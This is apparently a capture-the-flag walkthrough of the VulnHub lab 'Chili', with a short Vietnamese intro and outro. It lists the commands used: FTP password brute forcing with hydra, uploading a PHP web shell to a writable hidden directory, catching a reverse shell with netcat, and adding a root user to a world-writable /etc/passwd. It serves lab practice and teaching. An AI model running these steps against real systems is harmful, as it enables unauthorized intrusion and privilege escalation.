Download > Chili

Bài này cung cấp nhiều kiến thức rất hay, hãy lab và quay video lại nếu có thể…

Giới thiệu

Summary

This one was a pretty tricky box that i enjoyed a lot! Is easy but you have to think smart. We start by brute forcing FTP this will give us access to all system files, we search for a writeable directory under /var/www/html and we place our shell there. Privilege escalation to root is easy, /etc/passwd is writeable. Let’s pwn it! 

Enumeration/Reconnaissance

Let’s start as always with nmap.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

$ ip=192.168.1.13 $ nmap -p- --min-rate 10000 $ip

Port 80 has nothing interesting, i checked /robots.txt i tried directory brute force with gobuster with lot of wordlists but nothing. Anyway i checked the hint that maker provided on vulnhub page If you ever get stuck, try again with the name of the lab ahh here we go, let’s brute force FTP using username chili. (takes some time)

1 2 3 4 5 6 7 8 9 10 11

$ hydra -l chili -P /usr/share/wordlists/rockyou.txt $ip ftp [ftp] host: 192.168.1.13 login: chili password: a1b2c3d4

Shell as www-data

Perfect, we can login in as chili:a1b2c3d4. I enumerated the system but there is no SSH so only 1 solution left if we upload a shell under /var/www/html but isn’t writable. There is a hidden folder under /var/www/html that is writable:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

$ ftp $ip ftp> cd /var/www/html ftp> ls -la 200 drwxr-xr-x 4 0 0 4096 Sep 08 13:12 . drwxr-xr-x 3 0 0 4096 Sep 08 11:41 .. drwxrwxrwx 2 0 0 4096 Sep 08 13:14 .nano <----- drwxr-xr-x 2 0 0 4096 Sep 08 13:12 .vim -rw-r--r-- 1 0 0 74290 Oct 23 2018 Chile_WEB.jpg -rw-r--r-- 1 0 0 657 Sep 08 11:44 index.html 226 Directory send OK. ftp>

Let’s upload a php web shell under .nano and make it executable.

1 2 3 4 5 6 7 8 9 10

ftp> cd .nano ftp> put shell.php ftp> chmod 007 shell.php

Now let’s execute it & get shell.

1	$ curl http://$ip/.nano/shell.php

1 2 3 4 5 6

$ nc -lvp 5555 l $ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@chili:/$ whoami;id www-data uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell as chili

We can use the same FTP password to privesc to user chili now.

1 2 3 4 5 6

www-data@chili:/$ su - chili Password: a1b2c3d4 chili@chili:~$ whoami;id chili uid=1000(chili) gid=1000(chili) groups=1000(chili),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Shell as root

After some enumeration, i found that /etc/passwd is writable. Let’s simply add a root user in.

1 2	chili@chili:~$ ls -la /etc/passwd -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd

Let’s generate a password:

1 2	$ openssl passwd -6 -salt xyz pwned $6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1

Now we can add our user in.

1 2 3 4 5 6 7

chili@chili:~$ echo 'pwned:$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1:0:0::/root:/bin/bash' >> /etc/passwd chili@chili:~$ su - pwned Password: pwned root@chili:~# whoami;id root uid=0(root) gid=0(root) groups=0(root)

Let’s read the flag.

1 2	root@chili:~# cat proof.txt Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b

2 be CEH MASTER !